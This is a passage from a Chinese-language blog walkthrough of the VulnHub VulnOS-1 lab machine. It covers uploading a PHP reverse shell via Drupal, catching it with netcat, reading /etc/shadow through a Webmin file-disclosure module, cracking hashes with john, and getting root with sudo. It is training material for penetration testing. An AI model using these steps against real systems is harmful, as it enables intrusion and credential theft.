<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.56.124/drupal6/</span><br></pre></td></tr></table></figure>

<p>现在，必须找到上传PHP后门的地方。在《Administer》中，添加允许扩展的php和phtml。创建了帖子并附加了PHP后门。成功上传phtml后门文件，然后点击它…</p>
<ul>
<li><p><img src="https://raw.githubusercontent.com/wiki/FDlucifer/FDlucifer.github.io/vulnhub264.jpg"></p>
</li>
<li><p><img src="https://raw.githubusercontent.com/wiki/FDlucifer/FDlucifer.github.io/vulnhub265.jpg"></p>
</li>
</ul>
<p>访问shell</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.56.124/drupal6/sites/default/files/phpreverseshell2.phtml</span><br></pre></td></tr></table></figure>

<p>然后kali端使用nc监听</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~<span class="comment"># nc -lvp 5566</span></span><br><span class="line">listening on [any] 5566 ...</span><br><span class="line">192.168.56.124: inverse host lookup failed: Host name lookup failure</span><br><span class="line">connect to [192.168.56.102] from (UNKNOWN) [192.168.56.124] 56444</span><br><span class="line">Linux VulnOS 2.6.32-57-generic-pae <span class="comment">#119-Ubuntu SMP Wed Feb 19 01:20:04 UTC 2014 i686 GNU/Linux</span></span><br><span class="line"> 05:30:10 up  1:05,  0 <span class="built_in">users</span>,  load average: 0.03, 0.05, 0.34</span><br><span class="line">USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT</span><br><span class="line">uid=33(www-data) gid=33(www-data) <span class="built_in">groups</span>=33(www-data)</span><br><span class="line">/bin/sh: can<span class="string">&#x27;t access tty; job control turned off</span></span><br><span class="line"><span class="string">$ id</span></span><br><span class="line"><span class="string">uid=33(www-data) gid=33(www-data) groups=33(www-data)</span></span><br><span class="line"><span class="string">$ whoami</span></span><br><span class="line"><span class="string">www-data</span></span><br><span class="line"><span class="string">$ pwd</span></span><br><span class="line"><span class="string">/</span></span><br></pre></td></tr></table></figure>

<p>优秀！获得了有限制的shell！检查了目标操作系统，并找到Ubuntu 10.04。不幸的是，每项攻击都行不通。花了很多时间寻找一些“秘密”文件，</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">cat</span> /etc/nagios3/htpasswd.users</span><br><span class="line">nagiosadmin:8A86JOBWoCwnk</span><br></pre></td></tr></table></figure>

<p>将&#x2F;etc&#x2F;passwd文件中的用户名作为字典列表，可能会有帮助。尝试使用john破解此密码</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~/vulnhub/vulnos-1<span class="comment"># john pass --wordlist=/root/vulnhub/vulnos-1/wordlist</span></span><br><span class="line">Using default input encoding: UTF-8</span><br><span class="line">Loaded 1 password <span class="built_in">hash</span> (descrypt, traditional crypt(3) [DES 256/256 AVX2])</span><br><span class="line">Will run 4 OpenMP threads</span><br><span class="line">Press <span class="string">&#x27;q&#x27;</span> or Ctrl-C to abort, almost any other key <span class="keyword">for</span> status</span><br><span class="line">Warning: Only 44 candidates left, minimum 1024 needed <span class="keyword">for</span> performance.</span><br><span class="line">canuhack         (nagiosadmin)</span><br><span class="line">1g 0:00:00:00 DONE (2020-04-17 03:25) 100.0g/s 4400p/s 4400c/s 4400C/s root..canuhack</span><br><span class="line">Use the <span class="string">&quot;--show&quot;</span> option to display all of the cracked passwords reliably</span><br><span class="line">Session completed</span><br></pre></td></tr></table></figure>

<p>很遗憾，没有nagiosadmin用户。&#x2F;etc&#x2F;passwd中的用户名为hackme，所以也许应该为canuhackme作为用户密码？</p>
<p>使用msf的auxiliary&#x2F;admin&#x2F;webmin&#x2F;file_disclosure模块尝试读取&#x2F;etc&#x2F;shadow文件内容</p>
<p>然后将canuhackme添加到字典中</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br></pre></td><td class="code"><pre><span class="line">msf5 auxiliary(admin/webmin/file_disclosure) &gt; show options</span><br><span class="line"></span><br><span class="line">Module options (auxiliary/admin/webmin/file_disclosure):</span><br><span class="line"></span><br><span class="line">   Name     Current Setting   Required  Description</span><br><span class="line">   ----     ---------------   --------  -----------</span><br><span class="line">   DIR      /unauthenticated  <span class="built_in">yes</span>       Webmin directory path</span><br><span class="line">   Proxies                    no        A proxy chain of format <span class="built_in">type</span>:host:port[,<span class="built_in">type</span>:host:port][...]</span><br><span class="line">   RHOSTS   192.168.56.124    <span class="built_in">yes</span>       The target host(s), range CIDR identifier, or hosts file with syntax <span class="string">&#x27;file:&lt;path&gt;&#x27;</span></span><br><span class="line">   RPATH    /etc/shadow       <span class="built_in">yes</span>       The file to download</span><br><span class="line">   RPORT    10000             <span class="built_in">yes</span>       The target port (TCP)</span><br><span class="line">   SSL      <span class="literal">false</span>             no        Negotiate SSL/TLS <span class="keyword">for</span> outgoing connections</span><br><span class="line">   VHOST                      no        HTTP server virtual host</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Auxiliary action:</span><br><span class="line"></span><br><span class="line">   Name      Description</span><br><span class="line">   ----      -----------</span><br><span class="line">   Download  </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">msf5 auxiliary(admin/webmin/file_disclosure) &gt; run</span><br><span class="line">[*] Running module against 192.168.56.124</span><br><span class="line"></span><br><span class="line">[*] Attempting to retrieve /etc/shadow...</span><br><span class="line">[*] The server returned: 200 Document follows</span><br><span class="line">root:*:16137:0:99999:7:::</span><br><span class="line">daemon:*:16137:0:99999:7:::</span><br><span class="line">bin:*:16137:0:99999:7:::</span><br><span class="line">sys:*:16137:0:99999:7:::</span><br><span class="line"><span class="built_in">sync</span>:*:16137:0:99999:7:::</span><br><span class="line">games:*:16137:0:99999:7:::</span><br><span class="line">man:*:16137:0:99999:7:::</span><br><span class="line">lp:*:16137:0:99999:7:::</span><br><span class="line">mail:*:16137:0:99999:7:::</span><br><span class="line">news:*:16137:0:99999:7:::</span><br><span class="line">uucp:*:16137:0:99999:7:::</span><br><span class="line">proxy:*:16137:0:99999:7:::</span><br><span class="line">www-data:*:16137:0:99999:7:::</span><br><span class="line">backup:*:16137:0:99999:7:::</span><br><span class="line">list:*:16137:0:99999:7:::</span><br><span class="line">irc:*:16137:0:99999:7:::</span><br><span class="line">gnats:*:16137:0:99999:7:::</span><br><span class="line">nobody:*:16137:0:99999:7:::</span><br><span class="line">libuuid:!:16137:0:99999:7:::</span><br><span class="line">syslog:*:16137:0:99999:7:::</span><br><span class="line">landscape:*:16137:0:99999:7:::</span><br><span class="line">vulnosadmin:$6$SLXu95CH<span class="variable">$pVAdp447R4MEFKtHrWcDV7WIBuiP2Yp0NJTVPyg37K9U11SFuLena8p</span>.xbnSVJFAeg1WO28ljNAPrlXaghLmo/:16137:0:99999:7:::</span><br><span class="line">sysadmin:admin:16137:0:99999:7:::</span><br><span class="line">webmin:webmin:16137:0:99999:7:::</span><br><span class="line">hackme:hackme:16137:0:99999:7:::</span><br><span class="line">sa:password1:16137:0:99999:7:::</span><br><span class="line">stupiduser:stupiduser:16137:0:99999:7:::</span><br><span class="line">messagebus:*:16137:0:99999:7:::</span><br><span class="line">distccd:*:16137:0:99999:7:::</span><br><span class="line">sshd:*:16138:0:99999:7:::</span><br><span class="line">openldap:!:16138:0:99999:7:::</span><br><span class="line">ftp:!:16138:0:99999:7:::</span><br><span class="line">mysql:!:16138:0:99999:7:::</span><br><span class="line">telnetd:*:16138:0:99999:7:::</span><br><span class="line"><span class="built_in">bind</span>:*:16138:0:99999:7:::</span><br><span class="line">postgres:*:16138:0:99999:7:::</span><br><span class="line">postfix:*:16138:0:99999:7:::</span><br><span class="line">dovecot:*:16138:0:99999:7:::</span><br><span class="line">tomcat6:*:16138:0:99999:7:::</span><br><span class="line">statd:*:16138:0:99999:7:::</span><br><span class="line">snmp:*:16138:0:99999:7:::</span><br><span class="line">nagios:!:16140:0:99999:7:::</span><br><span class="line">openerp:*:16140:0:99999:7:::</span><br><span class="line">[*] Auxiliary module execution completed</span><br></pre></td></tr></table></figure>

<p>再次使用john加载字典进行破解</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~/vulnhub/vulnos-1<span class="comment"># cat pass2</span></span><br><span class="line">vulnosadmin:$6$SLXu95CH<span class="variable">$pVAdp447R4MEFKtHrWcDV7WIBuiP2Yp0NJTVPyg37K9U11SFuLena8p</span>.xbnSVJFAeg1WO28ljNAPrlXaghLmo/root@kali:~/vulnhub/vulnos-1<span class="comment"># john pass2 --wordlist=/root/vulnhub/vulnos-1/wordlist</span></span><br><span class="line">Using default input encoding: UTF-8</span><br><span class="line">Loaded 1 password <span class="built_in">hash</span> (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])</span><br><span class="line">Cost 1 (iteration count) is 5000 <span class="keyword">for</span> all loaded hashes</span><br><span class="line">Will run 4 OpenMP threads</span><br><span class="line">Press <span class="string">&#x27;q&#x27;</span> or Ctrl-C to abort, almost any other key <span class="keyword">for</span> status</span><br><span class="line">canuhackme       (vulnosadmin)</span><br><span class="line">1g 0:00:00:00 DONE (2020-04-17 03:52) 50.00g/s 2200p/s 2200c/s 2200C/s root..canuhackme</span><br><span class="line">Use the <span class="string">&quot;--show&quot;</span> option to display all of the cracked passwords reliably</span><br><span class="line">Session completed</span><br></pre></td></tr></table></figure>

<p>得到ssh登录用户名：vulnosadmin，密码：canuhackme</p>
<h3 id="登录并提权"><a href="#登录并提权" class="headerlink" title="登录并提权"></a>登录并提权</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~<span class="comment"># ssh vulnosadmin@192.168.56.124</span></span><br><span class="line">Enter passphrase <span class="keyword">for</span> key <span class="string">&#x27;/root/.ssh/id_rsa&#x27;</span>: </span><br><span class="line">vulnosadmin@192.168.56.124<span class="string">&#x27;s password: </span></span><br><span class="line"><span class="string">Linux VulnOS 2.6.32-57-generic-pae #119-Ubuntu SMP Wed Feb 19 01:20:04 UTC 2014 i686 GNU/Linux</span></span><br><span class="line"><span class="string">Ubuntu 10.04.4 LTS</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Welcome to Ubuntu!</span></span><br><span class="line"><span class="string"> * Documentation:  https://help.ubuntu.com/</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">  System information as of Fri Apr 17 09:55:15 CEST 2020</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">  System load:  0.0                Processes:           141</span></span><br><span class="line"><span class="string">  Usage of /:   16.3% of 23.06GB   Users logged in:     0</span></span><br><span class="line"><span class="string">  Memory usage: 38%                IP address for eth0: 192.168.56.124</span></span><br><span class="line"><span class="string">  Swap usage:   0%</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">  Graph this data and manage this system at:</span></span><br><span class="line"><span class="string">    https://landscape.canonical.com/</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">New release &#x27;</span>precise<span class="string">&#x27; available.</span></span><br><span class="line"><span class="string">Run &#x27;</span>do-release-upgrade<span class="string">&#x27; to upgrade to it.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Last login: Wed Mar 19 17:31:44 2014 from 192.168.1.3</span></span><br><span class="line"><span class="string">vulnosadmin@VulnOS:~$ id</span></span><br><span class="line"><span class="string">uid=1000(vulnosadmin) gid=1000(vulnosadmin) groepen=4(adm),20(dialout),24(cdrom),46(plugdev),109(lpadmin),110(sambashare),111(admin),1000(vulnosadmin)</span></span><br><span class="line"><span class="string">vulnosadmin@VulnOS:~$ whoami</span></span><br><span class="line"><span class="string">vulnosadmin</span></span><br><span class="line"><span class="string">vulnosadmin@VulnOS:~$ sudo -l</span></span><br><span class="line"><span class="string">[sudo] password for vulnosadmin: </span></span><br><span class="line"><span class="string">Matching Defaults entries for vulnosadmin on this host:</span></span><br><span class="line"><span class="string">    env_reset</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">User vulnosadmin may run the following commands on this host:</span></span><br><span class="line"><span class="string">    (ALL) ALL</span></span><br><span class="line"><span class="string">vulnosadmin@VulnOS:~$ su</span></span><br><span class="line"><span class="string">Wachtwoord: </span></span><br><span class="line"><span class="string">su: Authenticatie fout</span></span><br><span class="line"><span class="string">vulnosadmin@VulnOS:~$ sudo su</span></span><br><span class="line"><span class="string">root@VulnOS:/home/vulnosadmin# id</span></span><br><span class="line"><span class="string">uid=0(root) gid=0(root) groepen=0(root)</span></span><br><span class="line"><span class="string">root@VulnOS:/home/vulnosadmin# whoami</span></span><br><span class="line"><span class="string">root</span></span><br><span class="line"><span class="string">root@VulnOS:/home/vulnosadmin# cd /root</span></span><br><span class="line"><span class="string">root@VulnOS:~# ls</span></span><br><span class="line"><span class="string">hello.txt</span></span><br><span class="line"><span class="string">root@VulnOS:~# cat hello.txt </span></span><br><span class="line"><span class="string">Hello,</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">So you got root... You still need to find the rest of the vulnerabilities inside the OS !</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">TRY HARDER !!!!!!!</span></span><br></pre></td></tr></table></figure>

<p>成功登录，提权到root然后拿到了flag</p>
<ul>
<li><img src="https://raw.githubusercontent.com/wiki/FDlucifer/FDlucifer.github.io/vulnhub266.jpg"></li>
</ul>
<p><font color="red">注意，此靶机的漏洞非常多，在此不一一尝试了，有兴趣自己去尝试，有新的方法可以联系我QQ:1185151867。</font></p>
<h3 id="知识点总结"><a href="#知识点总结" class="headerlink" title="知识点总结"></a>知识点总结</h3><ul>
<li>msf exploit&#x2F;unix&#x2F;misc&#x2F;distcc_exec 模块利用distcc漏洞getshell</li>
<li>phpmyadmin弱口令</li>
<li>Drupal修改配置项上传phtml shell</li>
<li>john加载&#x2F;etc&#x2F;passwd用户名字典破解hash密码</li>
<li>msf auxiliary&#x2F;admin&#x2F;webmin&#x2F;file_disclosure模块读取&#x2F;etc&#x2F;shadow文件内容</li>
<li>sudo su 然后输入密码提权</li>
</ul>
<p><font color="red">Game over</font></p>
<p>不好意思，这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本，i am so sorry about this…It’s a pity…</p>
<p><img src="https://raw.githubusercontent.com/wiki/FDlucifer/FDlucifer.github.io/haha.jpg"></p>
<p><font color="green"><em><strong>The end,to be continue…</strong></em></font></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="reward-container">
  <div>Buy me a coffee</div>
  <button>
    Donate
  </button>
  <div class="post-reward">
      <div>
        <img src="/images/wechatpay.png" alt="lUc1f3r11 WeChat Pay">
        <span>WeChat Pay</span>
      </div>
      <div>
        <img src="/images/alipay.png" alt="lUc1f3r11 Alipay">
        <span>Alipay</span>
      </div>

  </div>
</div>

          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>Post author:  </strong>lUc1f3r11
  </li>
  <li class="post-copyright-link">
      <strong>Post link: </strong>
      <a href="https://fdlucifer.github.io/2020/04/16/vulnos-1/" title="vulnhub靶机渗透[vulnos-1]">https://fdlucifer.github.io/2020/04/16/vulnos-1/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</span> unless stating additionally.
  </li>
</ul>
</div>

          <div class="followme">
  <span>Welcome to my other publishing channels</span>

  <div class="social-list">

      <div class="social-item">
          <a target="_blank" class="social-link" href="https://twitter.com/fdlucifer11">
            <span class="icon">
              <i class="fab fa-twitter"></i>
            </span>

            <span class="label">Twitter</span>
          </a>
      </div>

      <div class="social-item">
          <a target="_blank" class="social-link" href="https://t.me/FDkiller">
            <span class="icon">
              <i class="fab fa-telegram"></i>
            </span>

            <span class="label">Telegram</span>
          </a>
      </div>

      <div class="social-item">
          <span class="social-link">
            <span class="icon">
              <i class="fab fa-weixin"></i>
            </span>

            <span class="label">WeChat</span>
          </span>

          <img class="social-item-img" src="/images/wechat_channel.jpg">
      </div>

      <div class="social-item">
          <a target="_blank" class="social-link" href="https://infosec.exchange/@lUc1f3r11">
            <span class="icon">
              <i class="fa fa-stack-exchange"></i>
            </span>

            <span class="label">infosec.exchange</span>
          </a>
      </div>

      <div class="social-item">
          <a target="_blank" class="social-link" href="/atom.xml">
            <span class="icon">
              <i class="fa fa-rss"></i>
            </span>

            <span class="label">RSS</span>
          </a>
      </div>
  </div>
</div>

          <div class="post-tags">
              <a href="/tags/vulnhub%E9%9D%B6%E6%9C%BA%E7%BB%83%E4%B9%A0/" rel="tag"><i class="fa fa-tag"></i> vulnhub靶机练习</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2020/04/15/HackLAB-Vulnix/" rel="prev" title="vulnhub靶机渗透[HackLAB-Vulnix]">
                  <i class="fa fa-chevron-left"></i> vulnhub靶机渗透[HackLAB-Vulnix]
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2020/04/17/vulnos-2/" rel="next" title="vulnhub靶机渗透[vulnos-2]">
                  vulnhub靶机渗透[vulnos-2] <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 2017 – 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">lUc1f3r11</span>
</div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
      <span>Word count total: </span>
    <span title="Word count total">619k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span>Reading time total &asymp;</span>
    <span title="Reading time total">37:30</span>
  </span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="Total Visitors">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="Total Views">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">Powered by <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & <span class="exturl" data-url="aHR0cHM6Ly90aGVtZS1uZXh0LmpzLm9yZy9tdXNlLw==">NexT.Muse</span>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="reading-progress-bar"></div>
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>

  <span class="exturl github-corner" data-url="aHR0cHM6Ly9naXRodWIuY29tL0ZEbHVjaWZlcg==" title="Follow me on GitHub" aria-label="Follow me on GitHub"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></span>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/medium-zoom/1.0.8/medium-zoom.min.js" integrity="sha256-7PhEpEWEW0XXQ0k6kQrPKwuoIomz8R8IYyuU1Qew4P8=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script><script src="/js/bookmark.js"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>




  <script src="/js/third-party/pace.js"></script>

  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





</body>
</html>
